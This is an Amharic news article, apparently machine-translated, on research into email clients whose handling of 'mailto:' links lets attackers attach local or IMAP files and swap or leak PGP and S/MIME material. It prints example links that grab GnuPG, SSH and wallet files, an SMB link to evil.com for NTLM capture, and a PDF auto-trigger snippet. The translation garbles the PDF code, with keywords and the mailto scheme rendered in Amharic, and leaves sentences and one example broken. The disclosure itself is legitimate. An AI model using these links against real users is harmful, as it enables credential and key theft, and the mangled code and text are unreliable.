የሩር ዩኒቨርሲቲ ቦቹም (ጀርመን) ተመራማሪዎች () የኢሜል ደንበኞች "mailto:" አገናኞችን በተራዘሙ መለኪያዎች ሲያስኬዱ የሚያሳዩት ባህሪ። ከተተነተኑት ሃያ የኢሜይል ደንበኞች ውስጥ አምስቱ "attach" የሚለውን መለኪያ በመጠቀም የሀብት ምትክን ለማዛባት ለሚደረግ ጥቃት ተጋላጭ ነበሩ። ሌሎች ስድስት የኢሜይል ደንበኞች የPGP እና S/MIME ቁልፎችን በመተካት ለሚደርስ ጥቃት ተጋላጭ ነበሩ፣ እና ሶስት ደንበኞች የተመሰጠሩ መልዕክቶችን ይዘት ለማውጣት ለሚደረግ ጥቃት ተጋላጭ ነበሩ።
አገናኞች «"በአገናኝ ውስጥ ለተገለጸው ተቀባዩ ኢሜይል ለመጻፍ የኢሜይል ደንበኛን በራስ-ሰር ለመክፈት ያገለግላሉ። ከአድራሻው በተጨማሪ አገናኙ እንደ ርዕሰ ጉዳይ መስመር እና ለተለመደው ይዘት አብነት ያሉ ተጨማሪ መለኪያዎችን ሊያካትት ይችላል። የታቀደው ጥቃት "አባሪ" የሚለውን መለኪያ ይቆጣጠራል፣ ይህም አባሪ ከሚፈጠረው ኢሜይል ጋር እንዲያያዝ ያስችለዋል።
የኢሜል ደንበኞቹ Thunderbird፣ GNOME Evolution (CVE-2020-11879)፣ KDE KMail (CVE-2020-11880)፣ IBM/HCL Notes (CVE-2020-4089) እና Pegasus Mail በ"mailto:?attach=file_path" ቅጽ አገናኝ በኩል የተገለጸውን ማንኛውንም የአካባቢ ፋይል በራስ-ሰር ማያያዝ የሚያስችል ቀላል ጥቃት ተጋላጭ ሆነው ተገኝተዋል። ፋይሉ ማስጠንቀቂያ ሳያሳይ ተያይዟል፣ ስለዚህ ልዩ ትኩረት ሳይሰጥ ተጠቃሚው ኢሜይሉ ከአባሪ ጋር እንደሚላክ ላያስተውል ይችላል።
ለምሳሌ፣ እንደ "mailto:?to=user@example.com&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" ያለ አገናኝ በመጠቀም የGnuPG የግል ቁልፎችን ወደ ኢሜይል ማስገባት ይችላሉ። እንዲሁም የክሪፕቶ ምንዛሬ ቦርሳዎችን (~/.bitcoin/wallet.dat)፣ የSSH ቁልፎችን (~/.ssh/id_rsa) እና ለተጠቃሚው ተደራሽ የሆኑ ማናቸውንም ፋይሎች ይዘቶችን መላክ ይችላሉ። በተጨማሪም፣ ተንደርበርድ እንደ "attach=/tmp/*.txt" ያሉ ግንባታዎችን በመጠቀም የፋይሎችን ቡድኖች በጭንብል እንዲያያይዙ ያስችልዎታል።
ከአካባቢያዊ ፋይሎች በተጨማሪ፣ አንዳንድ የኢሜይል ደንበኞች ወደ አውታረ መረብ ማከማቻ እና የIMAP አገልጋይ መንገዶች የሚወስዱ አገናኞችን ያካሂዳሉ። በተለይም፣ የIBM ማስታወሻዎች እንደ "attach=\\evil.com\dummyfile" ያሉ አገናኞችን በማስኬድ ፋይል ከአውታረ መረብ ማውጫ እንዲተላለፍ እንዲሁም በአጥቂው ቁጥጥር ስር ወዳለው የSMB አገልጋይ አገናኝ በመላክ የNTLM ማረጋገጫ መለኪያዎችን በመጥለፍ (ጥያቄው ከተጠቃሚው የአሁኑ የማረጋገጫ መለኪያዎች ጋር ይላካል) ይፈቅዳል።
ተንደርበርድ እንደ "attach=imap:///fetch>UID>/INBOX>1/" ያሉ ጥያቄዎችን በተሳካ ሁኔታ ያስኬዳል፣ ይህም በIMAP አገልጋይ ላይ ካሉ አቃፊዎች ይዘት እንዲያያይዙ ያስችልዎታል። ከIMAP የተገኙ መልዕክቶች፣ በOpenPGP እና S/MIME በኩል የተመሰጠሩ፣ ከመላክዎ በፊት በኢሜይል ደንበኛው በራስ-ሰር ይፈታሉ። የThunderbird ገንቢዎች በየካቲት ወር እና በጉዳዩ ላይ ስላለው ችግር ችግሩ አስቀድሞ ተስተካክሏል (የThunderbird ቅርንጫፎች 52፣ 60 እና 68 አሁንም ተጋላጭ ናቸው)።
የThunderbird የቀድሞ ስሪቶች በተመራማሪዎች ለተጠቆሙት ሁለት ሌሎች የPGP እና የS/MIME ጥቃቶች ተጋላጭ ነበሩ። በተለይም የቁልፍ-መለዋወጥ ጥቃት ለThunderbird እንዲሁም ለOutLook፣ PostBox፣ eM Client፣ MailMate እና R2Mail2 ተፈጻሚ ሆኖ ተገኝቷል። ይህ ጥቃት የሚከሰተው የኢሜይል ደንበኛው በS/MIME መልዕክቶች ውስጥ የተላለፉ አዳዲስ የምስክር ወረቀቶችን በራስ-ሰር ስለሚያስመጣ እና ስለሚጭን ነው፣ ይህም አጥቂ ተጠቃሚው አስቀድሞ የተከማቸውን የህዝብ ቁልፎች እንዲተካ ያስችለዋል።
ሁለተኛው ጥቃት፣ ተንደርበርድ፣ ፖስትቦክስ እና ሜይልሜትን የሚነካው፣ የመልእክት ረቂቆችን በራስ-ሰር የማዳን ዘዴን ያዛባል እና የሜይልቶ መለኪያዎችን በመጠቀም የተመሰጠሩ መልዕክቶችን ዲክሪፕት ማድረግ ወይም ዲጂታል ፊርማ ወደ የዘፈቀደ መልእክቶች መጨመር ይጀምራል፣ ውጤቱም ወደ አጥቂው የIMAP አገልጋይ ይተላለፋል። በዚህ ጥቃት፣ ሚስጥራዊ ጽሑፉ በ"body" መለኪያ በኩል ይተላለፋል፣ እና "meta refresh" መለያው ለአጥቂው የIMAP አገልጋይ ጥያቄ ለማስጀመር ይጠቅማል። ለምሳሌ፡ '
"mailto:" የሚሉ አገናኞችን ያለተጠቃሚ ጣልቃ ገብነት በራስ-ሰር ለማስኬድ፣ በልዩ ሁኔታ የተነደፉ የፒዲኤፍ ሰነዶችን መጠቀም ይቻላል - በፒዲኤፍ ውስጥ ያለው የOpenAction እርምጃ ሰነዱ ሲከፈት የmailto ተቆጣጣሪውን በራስ-ሰር እንዲያስጀምሩ ያስችልዎታል።
%PDF-1.5
10 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
ኢንዶብጄ
10 obj
<< /Type /Action /S /URI/URI (በፖስታ ይላኩልን:?body=——የPGP መልእክት ይጀምሩ——[…])>>
ኢንዶብጄ
ምንጭ: opennet.ru
